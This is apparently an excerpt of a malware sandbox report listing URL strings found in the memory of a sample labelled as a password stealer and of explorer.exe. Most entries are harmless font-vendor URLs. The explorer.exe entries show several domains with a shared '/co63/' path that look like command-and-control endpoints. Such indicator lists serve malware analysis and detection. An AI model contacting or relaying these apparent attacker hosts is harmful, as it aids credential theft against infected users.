          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390314780.0000000005776000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390741938.0000000005742000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390654824.0000000005747000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390882423.0000000005747000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390314780.0000000005776000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390372892.0000000005776000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390236589.0000000005776000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390359851.0000000005776000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn-
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390314780.0000000005776000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390359851.0000000005776000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnu-eN
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.freepad168.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.freepad168.com/co63/
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.freepad168.com/co63/www.pym479.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.freepad168.comReferer:
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.398342627.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.398248570.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.399392378.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.399863925.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.402229452.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.403042832.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.400763636.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.403222822.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.401400253.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.401767137.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.399024629.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.398668360.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.400637848.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.399621408.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.399465444.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.401711594.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.400330810.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.400548672.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.400168473.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.398342627.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.399316118.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.398897872.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.400393573.000000000575A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.inf9obase.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.inf9obase.com/co63/
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.inf9obase.com/co63/www.cucinainvenice.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.inf9obase.comReferer:
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392066294.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392167050.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391405610.0000000005755000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391867029.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392276202.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392786588.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392020681.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392926230.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391280868.0000000005751000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392117186.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392383105.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392213201.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392322140.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392547177.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/$
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/6
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392066294.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391405610.0000000005755000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391867029.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392020681.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391280868.0000000005751000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392117186.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/=
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391405610.0000000005755000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391280868.0000000005751000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/A
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/adnl
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391405610.0000000005755000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391280868.0000000005751000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/es-ew
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392066294.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391867029.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392020681.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392117186.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392066294.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392167050.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391867029.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392276202.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392786588.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392020681.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392926230.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392117186.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392383105.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392213201.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392322140.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392547177.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/$
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/=
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/H
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/n-u
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391405610.0000000005755000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/rtr~
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mattewigs.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mattewigs.com/co63/
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mattewigs.com/co63/www.dulichphucbinh.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mattewigs.comReferer:
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mazinhoccb.com
          Source: explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mazinhoccb.com/co63/
